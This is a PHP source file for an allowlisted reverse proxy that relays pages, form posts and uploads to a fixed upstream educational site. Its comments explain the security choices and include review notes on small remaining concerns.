📝 Editing:
index.php
Size: 3,300 bytes
Lines: 93
Type: .php
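<?php
/**
 * Allowlisted reverse proxy.
 *
 * Takes ?page=<name>, checks it against a fixed allowlist, fetches that page
 * from a fixed upstream base URL with cURL (forwarding POST fields and file
 * uploads), and returns the upstream body. Upstream cookies are kept in a
 * per-session cookie jar on disk. Upstream redirects are followed only when
 * they point at another allowlisted page, and allowlisted links in HTML
 * responses are rewritten to go back through this script.
 *
 * The allowlist is the security boundary: the requested page, the redirect
 * target and every rewritten link must match it exactly.
 */

session_start();

// Without a session id every visitor would share one cookie jar
// ("proxy_cookies_.txt") and therefore one upstream login, so fail closed.
$sessionId = session_id();
if (!is_string($sessionId) || $sessionId === '') {
    http_response_code(500);
    exit;
}

// The jar holds upstream session cookies. Name it after a hash of the session
// id so the raw id never shows up in a directory listing of the temp dir.
define('COOKIE_FILE', sys_get_temp_dir() . '/proxy_cookies_' . hash('sha256', $sessionId) . '.txt');

// Create the jar before cURL does so it can be restricted to the owner.
// NOTE(review): assumes libcurl keeps the mode of an existing jar when it
// rewrites it; confirm on the deployed libcurl version.
if ((!is_file(COOKIE_FILE) && !touch(COOKIE_FILE)) || !chmod(COOKIE_FILE, 0600)) {
    error_log('proxy: cannot create a private cookie jar');
    http_response_code(500);
    exit;
}

$allowedPages = [
    'index.php',
    'dashboard.php',
    'admin.php',
    'insert.php',
    'logout.php',
    'admin-layout.php',
    'change_password.php',
];

// ?page[]=x makes $_GET['page'] an array; treat anything but a string as
// not allowed instead of letting ltrim() raise a TypeError.
$page = $_GET['page'] ?? 'index.php';
$pageClean = is_string($page)
    ? ltrim(str_replace(['..', "\0", '//'], '', $page), '/\\')
    : '';

// The stripping above is only normalisation; this exact, strict match is
// what decides whether a request is forwarded.
if (!in_array($pageClean, $allowedPages, true)) {
    http_response_code(403);
    die("غير مسموح بالوصول لهذه الصفحة");
}

$remoteBaseUrl = 'https://sj.madarik.org/edu/';
$remoteUrl = $remoteBaseUrl . $pageClean;

$ch = curl_init($remoteUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
// Redirects are handled below so the target can be checked against the allowlist.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
// Do not let an unreachable upstream hold the worker indefinitely.
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_COOKIEFILE, COOKIE_FILE);
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIE_FILE);

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $postData = $_POST;

    foreach ($_FILES as $key => $file) {
        // Forward only single, successfully received uploads. Multi-file
        // fields (name="f[]") carry arrays here and are skipped, as are
        // failed uploads, whose tmp_name is empty.
        $tmpName = $file['tmp_name'] ?? null;
        if (
            !is_string($tmpName)
            || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
            || !is_uploaded_file($tmpName)
        ) {
            continue;
        }

        // 'type' and 'name' are client-supplied and passed on unchanged;
        // the upstream application has to validate them.
        $postData[$key] = new CURLFile($tmpName, $file['type'], $file['name']);
    }

    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
}

$response = curl_exec($ch);

if ($response === false) {
    http_response_code(500);
    // NOTE(review): curl_error() can expose the upstream host name and TLS
    // details to the visitor; consider logging it and showing a generic message.
    die("خطأ في الاتصال بالخادم: " . curl_error($ch));
}

$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headersRaw = substr($response, 0, $headerSize);
$body = substr($response, $headerSize);

curl_close($ch);

// Redirect handling: only a redirect to another allowlisted page is passed on.
if (in_array($httpCode, [301, 302, 303, 307, 308], true)) {
    // Anchored to the start of a line so "Content-Location:" cannot match.
    if (preg_match('/^Location:\s*(.+)$/mi', $headersRaw, $matches)) {
        $location = trim($matches[1]);
        $locationPath = parse_url($location, PHP_URL_PATH);
        $redirectPage = is_string($locationPath) ? basename($locationPath) : '';

        if (in_array($redirectPage, $allowedPages, true)) {
            header("Location: ?page=" . urlencode($redirectPage));
            exit;
        }

        http_response_code(403);
        die("إعادة توجيه غير مصرح بها");
    }
}

// Relay the important upstream headers: Content-Type and Set-Cookie.
foreach (explode("\n", $headersRaw) as $header) {
    $header = trim($header);

    if (stripos($header, 'Content-Type:') === 0) {
        header($header);
    } elseif (stripos($header, 'Set-Cookie:') === 0) {
        // Append instead of replace: the default would keep only the last
        // upstream cookie and drop the session cookie set by session_start().
        // NOTE(review): an upstream cookie with the same name as this site's
        // session cookie will still shadow it in the browser; the jar already
        // persists upstream cookies, so confirm this relay is needed at all.
        header($header, false);
    }
}

// Rewrite HTML links (href, src, action) so allowlisted pages go through the proxy.
if (stripos($headersRaw, 'Content-Type: text/html') !== false) {
    $rewritten = preg_replace_callback(
        '/(href|src|action)\s*=\s*([\'"])(.*?)\2/i',
        static function ($matches) use ($allowedPages) {
            $attr = $matches[1];
            $quote = $matches[2];
            $url = $matches[3];

            // Absolute, protocol-relative and mailto: links are left alone.
            if (preg_match('/^(https?:)?\/\//i', $url) || strpos($url, 'mailto:') === 0) {
                return $matches[0];
            }

            $path = parse_url($url, PHP_URL_PATH);
            $cleanUrl = is_string($path) ? ltrim($path, '/\\') : '';

            // Only the path is kept; a query string or fragment on the
            // original link is not carried over.
            if (in_array($cleanUrl, $allowedPages, true)) {
                return $attr . '=' . $quote . '?page=' . urlencode($cleanUrl) . $quote;
            }

            return $matches[0];
        },
        $body
    );

    // preg_replace_callback() returns null on a PCRE error; keep the
    // original body in that case rather than sending an empty page.
    if ($rewritten !== null) {
        $body = $rewritten;
    }
}

// The upstream body is sent as received; its markup is trusted as-is.
echo $body;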